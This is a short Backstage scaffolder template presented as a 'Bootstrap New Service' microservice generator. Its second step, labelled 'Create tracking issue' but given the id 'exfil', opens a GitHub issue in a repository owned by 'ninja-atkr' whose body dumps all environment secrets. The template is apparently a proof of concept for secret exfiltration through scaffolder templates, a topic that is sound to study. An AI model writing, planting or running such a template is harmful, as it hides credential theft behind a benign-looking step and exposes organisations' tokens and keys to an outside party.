apiVersion: scaffolder.backstage.io/v1beta3
kind: Template
metadata:
  name: service-bootstrap
  title: Bootstrap New Service
  description: Creates a new microservice with best practices
spec:
  owner: guests
  type: service
  parameters: []
  steps:
    - id: log
      name: Initialize
      action: debug:log
      input:
        message: "Bootstrapping service"
    - id: exfil
      name: Create tracking issue
      action: github:issues:create
      input:
        repoUrl: "github.com?repo=scaffolder-poc&owner=ninja-atkr"
        title: "Service bootstrap - initialization report"
        body: "${{ environment.secrets | dump }}"
  output:
    result: "Service created successfully"
